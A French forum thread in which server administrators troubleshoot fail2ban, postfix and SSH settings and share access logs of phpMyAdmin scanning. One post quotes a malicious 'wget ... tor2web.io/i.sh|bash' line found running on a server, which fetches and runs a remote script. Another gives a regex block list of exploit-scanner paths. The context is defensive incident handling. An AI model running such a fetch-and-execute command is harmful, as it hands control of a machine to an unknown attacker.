[Discussion] : Sécurisation & Logs {nginx} {lighttpd}

otello86 · 3 sept. 2017

Bon en fait j'ai parlé un peu vite car je ne les voyais plus au démarrage de fail2ban mais elles sont bien toujours là...

therealcorwin · 18 sept. 2017

otello86

Hello tout le monde, j'ai moi aussi ce problème sur fail2ban :
2017-09-18 16:50:12,972 fail2ban.transmitter [31328]: WARNING Command ['status', '-'] has failed. Received UnknownJailException('-',)
2017-09-18 16:50:13,249 fail2ban.transmitter [31328]: WARNING Command ['status', 'Jail'] has failed. Received UnknownJailException('Jail',)
2017-09-18 16:50:13,504 fail2ban.transmitter [31328]: WARNING Command ['status', 'list:'] has failed. Received UnknownJailException('list:',)

Et j'ai l'impression que des que ces messages apparaissent il ne ban plus aucune IP. Je dois redémarrer le service pour à nouveau bloquer les attaques, jusqu'à l’apparition de ces messages à nouveau.

Ne connaissant pas bien F2B et malgrés mes recherches/tests je ne trouve pas le souci . Donc j'attends vos lumières

PS:
Debian 9 première installation sur un dédié (même soucis sur Kimsufi & Online)
script d'Ex Rat adapté à debian 9

Peerotechnik · 8 oct. 2017

Bonjour
Encore merci pour ce merveilleux tuto pour la sécurité. Un vrai couteau suisse.

J'ai installé sur mon serveur les paquets suivants :

(avec les config. mentionnés dans le tuto)

Serveur Mail
Logwatch
Fail2Ban
Portsentry
RKHunter
Surveillance de notre log d’accès à Rutorrent et bannissement.

Que du bonheur et impressionné de voir les tentatives d'accès frauduleuses, alors que mon serveur tout neuf n'est pas encore été à la pêche aux torrents.

Toutes les installations fonctionnent, merci encore.

Mes questions sont :

Si je dois changer de FAI et que mon IP changera alors que je ne connais pas encore ce nouvel IP.
- Comment pouvoir me connecter avec ce nouvel IP ?

Avec e banner :
- Comment retirer une IP du bannissement ?

IP bannie avec Fail2Ban :
Est-il nécessaire de bannir cet IP avec e banner (ou redondance) ?
Je ne sais pas si le bannissement avec Fail2Ban est momentanée ou définitive.

Encore tous mes remerciements pour votre job.

Wagner · 11 oct. 2017

Si jamais @Peerotechnik il y a un problème, une solution existe (pour se connecter) grâce aux VPN.
C'est quoi e banner ? Néanmoins, je présume oui ce sera de la redondance.

Par rapport à Fail2Ban, c'est momentanée (de mémoire par défaut c'est fixé à 10 mn).
Elle aurait pu être définitive à la condition de redéfinir la variable bantime (c'est -1 la valeur, non ?).

## Pour obtenir la listes des jails.
fail2ban-client status;
## Voici un exemple pour connaître la durée du ban (de la dite jail).
fail2ban-client get sshd bantime;
## Dans cet exemple, on démontre comment retirer une IP du bannissement.
fail2ban-client set sshd unbanip 127.0.0.1;
## Tandis que le but de celui-ci, c'est de rajouter une IP à la liste d'exception (ou blanche).
fail2ban-client set sshd addignoreip 127.0.0.1;

Autrement, nous pouvons aussi le consulter : cat /etc/fail2ban/jail.local; (ou alors l'original nano /etc/fail2ban/jail.conf;)

Vendetta1985 · 27 oct. 2017

therealcorwin Bonjour,
J'ai le même soucis ... Tu as trouvé une solution ?

shyne · 27 oct. 2017

Il y a un tutoriel sur le site pour la mise en whitelist de son IP. L'idée étant de mettre son ip derrière un dns dynamique, si l'ip change, le nom de domaine dynamique ne change pas.

Wagner · 27 oct. 2017

Bonjour,

tu devrais relire les derniers messages @Vendetta1985 car il y a une ressemblance (le n°540).

Vendetta1985 · 30 oct. 2017

Bonjour,

Merci pour vos réponses, mais je ne vois pas trop ce qui pourrais m'aider
shyne Je pense que ta réponse ne m'était pas destinée mais que c'était plutôt pour Peerotechnik

Wagner La seule ressemblance que je trouve est celle avec therealcorwin et je ne vois pas de solution (j'ai déjà essayé le stop/start, cela ne change rien). Au passage, à quoi sert la commande fail2ban-client -t

Pour remettre une explication claire du "soucis" :
Dans mon fichier /var/log/fail2ban.log, j'ai les lignes suivantes qui reviennent toutes les 5 minutes :

2017-10-30 12:25:15,591 fail2ban.transmitter    [17347]: WARNING Command ['status', 'list:'] has failed. Received UnknownJailException('list:',)
2017-10-30 12:25:15,514 fail2ban.transmitter    [17347]: WARNING Command ['status', 'Jail'] has failed. Received UnknownJailException('Jail',)
2017-10-30 12:25:15,253 fail2ban.transmitter    [17347]: WARNING Command ['status', '`-'] has failed. Received UnknownJailException('`-',)

J'utilise Fail2Ban v0.9.6 sur Debian 9.

Je vois pas trop où chercher ... Je pense que je vais commencer par mes Cron car l'erreur étant précisément toutes les 5 minutes, peut être que ...

Wagner · 31 oct. 2017

Bonjour,

de rien @Vendetta1985 et c'est la même optique : "la détection d'erreur" mais c'est probablement très très très limité... Qui sait un jour cela aura peut-être grandement bien évolué.

@otello86 elles sont bien toujours là [...]

Argh je n'avais pas vu celui-ci alors j'ai cru à tort qu'il l'avait résolu.

@otello86 [...] ajouter une section [ssh]

Toutefois, cela me donne l'impression qu'il y avait une erreur de syntaxe (le nom de la jail ? Une coquille).
Je ne serais le dire mais nous pourrions éliminer cette piste grâce à la liste des jails (que nous pouvons obtenir via fail2ban-client status) et un extrait du fichier jail.local (j'imagine que le nom seule pourrait convenir).

@otello86 Command ['status', 'Jail'] has failed. Received UnknownJailException('Jail',)
Command ['status', '-'] has failed. Received UnknownJailException('-',)
Command ['status', 'list:'] has failed. Received UnknownJailException('list:',)

À moins que cela soit la version ? Depuis quelques mois, je me sers Fail2Ban_v0.11 alors je le crains, non je ne pourrais probablement pas regarder.

dam · 25 nov. 2017

Bonsoir.
J'ai pas mal de souci depuis quelque temps à la réception des mails sur une boite Gmail.
Chose étonnante quand je test

 echo 'Salut, je suis un email.' | mail -s 'Hello world' root

je ne reçois rien par contre pas de problème sur la réception du mail pour me signaler la connexion root.

Avez vous constaté aussi ce problème.

Peerotechnik · 22 janv. 2018

dam

J'ai le même problème.

Je précise qu'avant la redirection des mails "root" le serveur mail fonctionnait, c'est dès que je rajoute

 root: mon_email@gmail.com

... que je ne reçois plus d'email de confirmation en test.

À ma 1re installation tout a bien fonctionné, mais à ma 2e (raz) plus du tout.

dam · 3 févr. 2018

Peerotechnik

Bonjour.
Finalement moi je n'ai plus de problème. Par contre quelques fois il m'arrive de recevoir un mail de ce type

 Objet :	Cron <root@ns.....> test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/cron.daily/logrotate:
ERROR  Unable to contact server. Is it running?
error: error running non-shared postrotate script for /var/log/fail2ban.log of '/var/log/fail2ban.log '
run-parts: /etc/cron.daily/logrotate exited with return code 1

Erusaris · 5 févr. 2018

Vendetta1985 Je rencontre le même problème tu aurais trouver une solution ?

Erusaris · 6 févr. 2018

Plus de soucis avec

Fail2Ban v0.11.0.dev1

J'ai suivi se tuto, mon jail.local

fail2ban-client status
Status
|- Number of jail:      4
`- Jail list:   nginx-auth, nginx-badbots, ssh, vsftpd

tail -f /var/log/fail2ban.log
2018-02-06 14:00:36,683 fail2ban.filter         [22626]: INFO    Added logfile: '/var/log/nginx/rutorrent-access.log' (pos = 36433, hash = ea764a7508e2a9fd1fe8983c78ed8dc6)
2018-02-06 14:00:36,684 fail2ban.filter         [22626]: INFO    Added logfile: '/var/log/nginx/access.log' (pos = 0, hash = d41d8cd98f00b204e9800998ecf8427e)
2018-02-06 14:00:36,685 fail2ban.filter         [22626]: INFO      maxRetry: 5
2018-02-06 14:00:36,685 fail2ban.filter         [22626]: INFO      encoding: ANSI_X3.4-1968
2018-02-06 14:00:36,685 fail2ban.actions        [22626]: INFO      banTime: 600
2018-02-06 14:00:36,686 fail2ban.filter         [22626]: INFO      findtime: 600
2018-02-06 14:00:36,689 fail2ban.jail           [22626]: INFO    Jail 'vsftpd' started
2018-02-06 14:00:36,689 fail2ban.jail           [22626]: INFO    Jail 'ssh' started
2018-02-06 14:00:36,690 fail2ban.jail           [22626]: INFO    Jail 'nginx-auth' started
2018-02-06 14:00:36,691 fail2ban.jail           [22626]: INFO    Jail 'nginx-badbots' started

Peerotechnik · 10 mars 2018

Pour le bannissement en tapant ban + IP à bannir :

Est-il possible de bannir une plage d'IP de par exemple: 26.16.0.0 à 26.16.256.256 ?
Si oui comment taper cette plage ?

ou faut-il directement aller sur iptables ?

Merci

Peerotechnik · 17 mars 2018

Re...

J'ai un "petit" souci avec ma sécurisation SSH. Je n'arrive ni à changer mon port, ni interdire la connexion "non root", ni à permettre un nouvel utilisateur pour la connexion SSH.

Pour commencer: si je change seulement le port 22 en port xxxxx, déjà là je ne peux plus me connecter avec la console. Je précise que plusieurs ports ont été testés et que le restart de SSH a été fait.

/etc/init.d/ssh restart

Je publie mon fichier de config. de SSH pour voir si une ou plusieurs incorrections y figurent.
<utilisateur-nouveau> = le nom de utilisateur créer pour la connexion SSH. (décommentée si le besoin est)
Match user <utilisateur-rutorrent> = utilisateur créé pour le rutorrent

nano /etc/ssh/sshd_config

Mon SSH

# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
# Choix des utilisateurs autorisés à se connecter,
# Ajouter nouvel user qu'on a créé plus haut.
# AllowUsers <utilisateur-nouveau>

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile     %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

#Subsystem sftp /usr/lib/openssh/sftp-server
Subsystem sftp internal-sftp

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

Match user <utilisateur-rutorrent> # etc... note : pas d'espace entre les virgules
ChrootDirectory %h

Wagner · 17 mars 2018

Salut,

non désolé @Peerotechnik je ne vois rien qui cloche. Néanmoins, j'espère que quelqu'un d'autre la verra car là je passe mon tour (fatigue, IRL etc).
Et puis, c'est assez étrange car cela devrait fonctionner (un exemple : le changement de port ne m'a jamais causé de souci et ce depuis Debian 6 (aka Squeeze)).

Peerotechnik · 19 mars 2018

Wagner
Merci tout de même d'avoir checké mon SSH config.

Wagner · 15 mai 2018

Des avis sur suricata ? Grosso modo, l'aventurier est en vacances (a priori il doit manquer des informations).

Tandis qu'au sujet de F2B (aka Fail2Ban), un jour il faudra revoir ça sic... Parce que dès fois, il ne réagit pas assez rapidement (un souci lié aux regex ?).

Voici une (re)copie (ultra récente) des logs :

[14/May/2018:10:22:37 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:38 +0200] "GET /phpMyAdmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:39 +0200] "GET /pmd/index.php HTTP/1.1" 404
[14/May/2018:10:22:40 +0200] "GET /pma/index.php HTTP/1.1" 404
[14/May/2018:10:22:40 +0200] "GET /PMA/index.php HTTP/1.1" 404
[14/May/2018:10:22:41 +0200] "GET /PMA2/index.php HTTP/1.1" 404
[14/May/2018:10:22:41 +0200] "GET /pmamy/index.php HTTP/1.1" 404
[14/May/2018:10:22:41 +0200] "GET /pmamy2/index.php HTTP/1.1" 404
[14/May/2018:10:22:42 +0200] "GET /mysql/index.php HTTP/1.1" 404
[14/May/2018:10:22:42 +0200] "GET /admin/index.php HTTP/1.1" 404
[14/May/2018:10:22:42 +0200] "GET /db/index.php HTTP/1.1" 404
[14/May/2018:10:22:42 +0200] "GET /dbadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:43 +0200] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:43 +0200] "GET /admin/pma/index.php HTTP/1.1" 404
[14/May/2018:10:22:43 +0200] "GET /admin/PMA/index.php HTTP/1.1" 404
[14/May/2018:10:22:43 +0200] "GET /admin/mysql/index.php HTTP/1.1" 404
[14/May/2018:10:22:44 +0200] "GET /admin/mysql2/index.php HTTP/1.1" 404
[14/May/2018:10:22:45 +0200] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:45 +0200] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:45 +0200] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404
[14/May/2018:10:22:46 +0200] "GET /mysqladmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:46 +0200] "GET /mysql-admin/index.php HTTP/1.1" 404
[14/May/2018:10:22:47 +0200] "GET /phpadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:47 +0200] "GET /phpmyadmin0/index.php HTTP/1.1" 404
[14/May/2018:10:22:47 +0200] "GET /phpmyadmin1/index.php HTTP/1.1" 404
[14/May/2018:10:22:49 +0200] "GET /phpmyadmin2/index.php HTTP/1.1" 404
[14/May/2018:10:22:49 +0200] "GET /myadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:49 +0200] "GET /myadmin2/index.php HTTP/1.1" 404
[14/May/2018:10:22:50 +0200] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:50 +0200] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404
[14/May/2018:10:22:50 +0200] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:50 +0200] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:51 +0200] "GET /phpmyadmin-old/index.php HTTP/1.1" 404
[14/May/2018:10:22:51 +0200] "GET /phpMyAdminold/index.php HTTP/1.1" 404
[14/May/2018:10:22:52 +0200] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404
[14/May/2018:10:22:52 +0200] "GET /pma-old/index.php HTTP/1.1" 404
[14/May/2018:10:22:53 +0200] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:53 +0200] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:53 +0200] "GET /phpma/index.php HTTP/1.1" 404
[14/May/2018:10:22:53 +0200] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404
[14/May/2018:10:22:54 +0200] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404

Auquel je rajoute un exemple de filtre (grâce aux regex) :

##Il doit être possible de le simplifier (ou alors le rendre nettement plus lisible et efficace).
##Je m'y connais assez peu dans ce domaine (j'entends les regex)...
##-------------------------------------------##
FirstList = admin|dbadmin|myadmin|mysql|sql
SecondList = probethenet|soapcaller|x00cookie
ThirdList = manager|msd1.24stable|muieblackcat|soapcaller|shopdb|sqlmanager|mysqlmanager|mysqldumper
ScriptList = command.php|common.cgi|getcfg.php|hndUnblock.cgi|tmUnblock.cgi
FiveList = pma|phpadmin|phpmyadmin|phpmy|php-my-admin|2phpmyadmin|phpmyadmin4|phppma|php-myadmin|phpmy-admin
AboutCMSList = database|db|joomla|cms|jenkins|jmx-console
StangeList = wallet|wp
##-------------------------------------------##
ElementToBlocks = (<FirstList>|<SecondList>|<ThirdList>|<ScriptList>|<FiveList>|<AboutCMSList>|<StangeList>)
failregex = no user/password was provided for basic authentication.client: <HOST>
user . was not found in.client: <HOST>
user . password mismatch.client: <HOST>
^(?i)<HOST> . "(GET|POST|HEAD|USER|CONNECT) .(%(ElementToBlocks)s). HTTP." (400|403|404|405|406|444) .$

Le fichier jail.local est censé les bloquer (ou bannir car il est configuré comme tel maxretry = 8 ou maxretry = 16).
Donc, il y a un problème avec Fail2Ban car d'après les logs, il y a près de 40 requêtes qui passe avant qu'il remplisse son rôle (bannir).
À moins que le problème soit lié à Nginx (la limitation de nombre de requête, etc) ?

NB : Oublier PSAD car grosso modo, il n'y a aucun support.

Wagner · 5 juin 2018

/bin/sh -c wget -qO- -U- https://httpsxztdjm2vrpw.tor2web.io/i.sh|bash
wget -qO- -U- https://httpsxztdjm2vrpw.tor2web.io/i.sh

Quelqu'un aurait une idée d'où cela provient ?
Une autre lacunes de Fail2Ban ? Pourtant, cela trourne en boucle (les ban à cause des très nombreuses 404).

Mauvaise nouvelle car le prestataire a choisi d'opter pour la prudence alors elle est presque totalement bloquer. Certes, je peux y accéder (temporairement) mais a priori les logs ne sont pas très parlant sic...
Une solution temporaire ?

kill -9 `pgrep wget`;

En attendant de trouver mieux car je commence à croire que Fail2Ban à vraiment besoin d'être améliorer. Disons que j'ai juste redémarrer la machine et il y a de noouveau bugger dès le départ : fail2ban-client start sic...Comment il fait pour effacer son propre dossier ? C'est n'importe quoi là sic...

Nebukad · 6 juin 2018

Bonjour,

Je ne connais pas ce type de filtre regex pour Fail2ban.

Voici celle que j'ai avec le script Bonobox, et il fonctionne bien :

filtre regex badbots

Wagner · 8 juil. 2018

Bonjour,

tout d'abord navré @Nebukad pour cette réponse très tardive. Non je n'ai pas oublié car je n'ai pas le temps (etc) de m'occcuper de ce problème.
Non Il n'y a eu aucun souci auparavant (sur ces 8 derniers mois) alors j'ai du mal à le comprendre sic... Il s'est passé quoi ? Aucune idée car non les logs ne sont pas très parlant sic...

Au fond, nous avons la même chose. Parce que la seule différence : c'est la syntaxe (via les regex dont j'ai déjà donné un exemple dans un message précédent).
En dehors de ça, ma liste est légèrement plus longue (plus de cible) mais Fail2Ban aurait-il encore buggé ? C'est possible car je m'en souviens encore et oui je l'ai déjà signaler (même 2 ou 3 fois) sic... Cependant, il ne fut pas corrigé car j'ai vérifier (quelques fois) ces derniers mois sic...

À moins que le souci ne provienne de iptables ? J'ai découvert qu'il était totalement vide contrairement à Fail2Ban.
Au sujet de Suricata, il n'y a toujours personne ? Enfin s'il reste un aventurier fou dans les parages MDR Diantre, il aurait pu faire un effort concernant la documentation (de nos jours, elle semble assez obsolète etc).

J'ai déjà pensé à Ossec mais il faudrait une meilleur interface (j'ai beaucoup de mal avec le langage XML car comme on dit : cela n'est pas ma tasse de thé) sic...

Enfin bref, je donnerais des nouvelles plus tard. Disons que pour l'instant, j'ai divers souci IRL à résoudre...

Backtoback · 11 oct. 2018

Bonjour,

J'ai un souci que je n'arrive pas à résoudre.
J'ai suivi la partie du tuto pour postfix mais impossible d'envoyer un email. Je ne comprends pas pourquoi.
Je cherche à l'installer sur un Raspberry Pi hébergé chez moi, mais rien ne marche.

Au début j'ai pensé que cela était due au fait que mon Raspberry Pi étant dans une DMZ. Donc j'ai suivi le tuto pour un autre dans mon réseau local. Cela ne change rien.

J'ai toujours le mm message d'erreur:

Oct 11 12:16:03 HOSTNAME postfix/postfix-script[17384]: starting the Postfix mail system
Oct 11 12:16:03 HOSTNAME postfix/master[17386]: daemon started -- version 3.1.8, configuration /etc/postfix
Oct 11 12:16:08 HOSTNAME postfix/pickup[17387]: 2166160E2A: uid=0 from=<root@HOSTNAME>
Oct 11 12:16:08 HOSTNAME postfix/cleanup[17412]: 2166160E2A: message-id=<20181011101608.2166160E2A@HOSTNAME.lan>
Oct 11 12:16:08 HOSTNAME postfix/qmgr[17388]: 2166160E2A: from=<root@HOSTNAME>, size=392, nrcpt=1 (queue active)
Oct 11 12:16:38 HOSTNAME postfix/smtp[17414]: connect to gmail-smtp-in.l.google.com[173.194.76.27]:25: Connection timed out
Oct 11 12:17:08 HOSTNAME postfix/smtp[17414]: connect to alt1.gmail-smtp-in.l.google.com[64.233.165.26]:25: Connection timed out
Oct 11 12:17:38 v postfix/smtp[17414]: connect to alt2.gmail-smtp-in.l.google.com[74.125.68.27]:25: Connection timed out
Oct 11 12:18:08 HOSTNAME postfix/smtp[17414]: connect to alt3.gmail-smtp-in.l.google.com[108.177.125.26]:25: Connection timed out
Oct 11 12:18:38 HOSTNAME postfix/smtp[17414]: connect to alt4.gmail-smtp-in.l.google.com[74.125.195.27]:25: Connection timed out
Oct 11 12:18:38 HOSTNAME postfix/smtp[17414]: 2166160E2A: to=<mymail@gmail.com>, relay=none, delay=151, delays=0.24/0.11/150/0, dsn=4.4.1, status=deferred (connect to alt4.gmail-smtp-in.l.google.com[74.125.195.27]:25: Connection timed out)

Merci pour votre aide

Magicalex · 11 oct. 2018

Backtoback Le tuto date. Si tu veux configurer un serveur mail, je conseil l'image docker de hardware https://github.com/hardware/mailserver

Sinon vérifies que le port 25 est bien ouvert :
alt4.gmail-smtp-in.l.google.com[74.125.195.27]:25: Connection timed out

Backtoback · 11 oct. 2018

Magicalex Merci pour les infos, et pour la balise que tu as rajouté.
Le tuto date en effet, mais marchait très bien avant

Comme c'est pour un Raspberry Pi, je suis pas trop fan de docker.

Merci pour ta réponse

ex_rat · 11 oct. 2018

Salut
J'ai utilisé la partie "mail" il y a deux jours sur mon nouveau Kim' et pas de soucis d'install', les mail sortent bien.
Le problème doit être ailleurs mais je ne peux pas t'en dire plus, désolé.
Ex.

Backtoback · 12 oct. 2018

Merci.
J'ai changé la conf et utilise le SMTP de ma box FAI.
Je comprends pas totalement. Postfix n'est pas censé être un serveur SMTP?
Cordialement

totoph33 · 18 oct. 2018

therealcorwin
Bonjour, j'ai le meme soucis sur fail2ban que toi .As tu trouvé une solution?
C'est 2018-10-18 10:05:22,274 fail2ban.transmitter [14908]: WARNING Command ['status', '-'] has failed. Received UnknownJailException('-',)
2018-10-18 10:05:22,668 fail2ban.transmitter [14908]: WARNING Command ['status', 'Jail
'] has failed. Received UnknownJailException('Jail',)
2018-10-18 10:05:23,061 fail2ban.transmitter [14908]: WARNING Command ['status', 'list
:'] has failed. Received UnknownJailException('list:',)

hackerman · 28 oct. 2018

Idem, j'ai le même problème de fail2ban. Install bonobox sur Debian 9 toute fraiche. Je n'y comprends rien.

fail2ban-client status 0 < 17:03:21
Status
|- Number of jail: 8
`- Jail list: nginx-auth, nginx-badbots, nginx-dos, postfix, postfix-rbl, ssh, sshd, vsftpd

Ses 3 commandes reviennent toutes les 5 min.
2018-10-28 17:00:13,019 fail2ban.transmitter [26226]: WARNING Command ['status', '-'] has failed. Received UnknownJailException('-',)
2018-10-28 17:00:13,303 fail2ban.transmitter [26226]: WARNING Command ['status', 'Jail'] has failed. Received UnknownJailException('Jail',)
2018-10-28 17:00:13,587 fail2ban.transmitter [26226]: WARNING Command ['status', 'list:'] has failed. Received UnknownJailException('list:',)

ex_rat · 28 oct. 2018

Salut
j'ai pas le temps en ce moment de tester, mais si tu veux revenir à un fail2ban brut:

cd /etc/fail2ban

tu backup le jail.local du script pour revenir à l’utilisation du fichier jail.conf de base:

mv jail.local jail.local.bak

et tu restart:

service fail2ban restart

là tu n'as de base que le ssh/22 sous surveillance mais tu ne devrais plus avoir d'erreurs, pour le reste il faudra trouver un autre tuto. Des machins ont du changer avec debian9, mais là je ne peux vraiment pas.
Ex.

hackerman · 28 oct. 2018

Merci Ex

J'ai déja test et c'est idem, donc de base il y a une merde mais je ne vois pas quoi.
Je vais tenter de desinstall via purge et repartir de zéro pour voir.

hackerman · 29 oct. 2018

J'ai suivi le tuto de Erusaris (fail2ban en 0.11) et ça a fonctionné car plus d'erreur.
ça m'a "juste" foutu le bordel au niveau de systemd. Impossible de lancer la commande service fail2ban avec ce tuto.
Du coup je le lance via la commande client et ça roule mais le système en lui même n'est plus propre à ce sujet.

Du coup surement un problème de version ou un bug dans les fichiers de conf. Bizarre car en purgeant et en réinstallant j'ai le même problème et le bug n'as pas l'air signalé chez fail2ban.

Assez chiant tout de même. Donc si quelqu'un a une solution propre et fonctionnel, je suis super preneur afi nde sécure au mieux le serveur.

Bonne journée.

404 · 29 oct. 2018

hackerman Salut

Quel genre de désagrément tu constate avec systemd ?

/etc/init.d/fail2ban status | start | stop

Fonctionne ?

Et aussi est ce que tu rencontre un problème avec la commande ?

fail2ban-client

Limite ce thread te viendrai pas en aide ?

For systemd systems:
You have to specify the backend in /etc/fail2ban/jail.conf to use systemd as follows:

backend = systemd

Then restart fail2ban:

systemctl restart fail2ban

hackerman · 29 oct. 2018

Vu que j'ai suivi l'autre tuto de Erusaris ici
https://wiki.debian-fr.xyz/Fail2ban_v0.11.x_avec_support_IPv6_sur_Debian_Stretch
je n'ai donc pas install fail2ban via les dépôts Debian.
Donc la commande :
/etc/init.d/fail2ban
ne renvoi rien du tout.

fail2ban-client fonctionne très bien.

Suite au tuto vu plus haut, j'ai cela

┌─<root @ sd-126935 in /h/leonidas>
└─<>──» service fail2ban status

● fail2ban.service
Loaded: not-found (Reason: No such file or directory)
Active: failed (Result: exit-code) since Sun 2018-10-28 23:44:21 CET; 20h ago

Oct 28 23:44:21 sd-126935 systemd[1]: Starting LSB: Start/stop fail2ban...
Oct 28 23:44:21 sd-126935 fail2ban[26592]: Starting authentication failure monitor: fail2ban failed!
Oct 28 23:44:21 sd-126935 systemd[1]: fail2ban.service: Control process exited, code=exited status=1
Oct 28 23:44:21 sd-126935 systemd[1]: Failed to start LSB: Start/stop fail2ban.
Oct 28 23:44:21 sd-126935 systemd[1]: fail2ban.service: Unit entered failed state.
Oct 28 23:44:21 sd-126935 systemd[1]: fail2ban.service: Failed with result 'exit-code'.

J'ai test ton thread et cela n'a pas aidé.
J'utilise donc ala commande fail2ban-client restart | start | stop | reload pour l'instant.

Merci tout de même.

404 · 29 oct. 2018

hackerman

je n'ai donc pas install fail2ban via les dépôts Debian.
Donc la commande :
/etc/init.d/fail2ban
ne renvoi rien du tout.

Suis-je bête ... Bien vue

Quand tu avais désinstallé fail2ban tu avais supprimer aussi le dossier dans /etc ?

apt remove --purge fail2ban && rm -rf /etc/fail2ban

Je te demande car j'ai pas eu le problème, en faite Erusaris et moi même faisons qu'un. J'ai égarer mes identifiants

Bon sinon :

wget https://raw.githubusercontent.com/fail2ban/fail2ban/0.11/files/debian-initd -O /etc/init.d/fail2ban
update-rc.d fail2ban defaults
service fail2ban restart

Essaye et tiens nous au courant

hackerman · 30 oct. 2018

plop,

Oui j'avais bien supprimer le dossier /etc/fail2ban après avoir désinstall la version des dépôts.

J'ai donc tester ta modif et voila le résultat:

┌─<root @ sd-126935 in /h/leonidas>
└─<>──» service fail2ban restart                                    0 < 18:22:00
Failed to restart fail2ban.service: Unit fail2ban.service not found.

En fait je pense que c'est cette partie du tuto qui a foutu la merde

Automatisation lancement

# cp files/debian-initd /etc/init.d/fail2ban
# chmod +x /etc/init.d/fail2ban
# systemctl enable fail2ban.service

fail2ban.service is not a native service, redirecting to systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable fail2ban

# systemctl daemon-reload
# service fail2ban restart
# service fail2ban status
● fail2ban.service - LSB: Start/stop fail2ban
   Loaded: loaded (/etc/init.d/fail2ban; generated; vendor preset: enabled)
   Active: active (exited) since Mon 2017-11-27 09:07:24 EAT; 4s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 11586 ExecStart=/etc/init.d/fail2ban start (code=exited, status=0/SUCCESS)

nov. 27 09:07:24 dev.domaine.com systemd[1]: Starting LSB: Start/stop fail2ban...
nov. 27 09:07:24 dev.domaine.com fail2ban[11586]: Starting authentication failure monitor: fail2ban.
nov. 27 09:07:24 dev.domaine.com systemd[1]: Started LSB: Start/stop fail2ban.

hackerman · 2 nov. 2018

Bon j'ai test sur une VM toute fraiche avec bonobox installé.
On a le soucis de la version de fail2ban (0.9.x) installé via les dépôts et le script bonobox avec les lignes revenant toutes les 3min. (Voir mes comms plus haut)
J'ai donc effectué la manip suivante (désinstall de la version des depots et install de la dernière version via github) :

 # apt remove --purge fail2ban
# rm -rf /etc/fail2ban
# apt install python python-dnspython python-pyinotify gamin 
 # cd /usr/local/
# git clone https://github.com/fail2ban/fail2ban.git
 # cd fail2ban
# python setup.py install

Et c'est la ou je n'ai pas suivi le tuto de 404 (https://wiki.debian-fr.xyz/Fail2ban_v0.11.x_avec_support_IPv6_sur_Debian_Stretch), j'ai suivi la documentation sur le github:

Automatisation lancement:

Please note that the system init/service script is not automatically installed. To enable fail2ban as an automatic service, simply copy the script for your distro from the files directory to /etc/init.d. Example (on a Debian-based system):

cp files/debian-initd /etc/init.d/fail2ban
update-rc.d fail2ban defaults
service fail2ban start

--> Et la la commande service fail2ban fonctionne nickel

Donc j'en déduit que les commandes suivantes du tuto foutent la merde :
```
systemctl enable fail2ban.service
   fail2ban.service is not a native service, redirecting to systemd-sysv-install.
   Executing: /lib/systemd/systemd-sysv-install enable fail2ban
# systemctl daemon-reload
```
Je n'ai pas chercher à debug Fail2ban installé par le script de EX mais il est bon de savoir qu'il y a un petit souci (surement une connerie...)

Plus qu'à réinstaller proprement mon serveur.
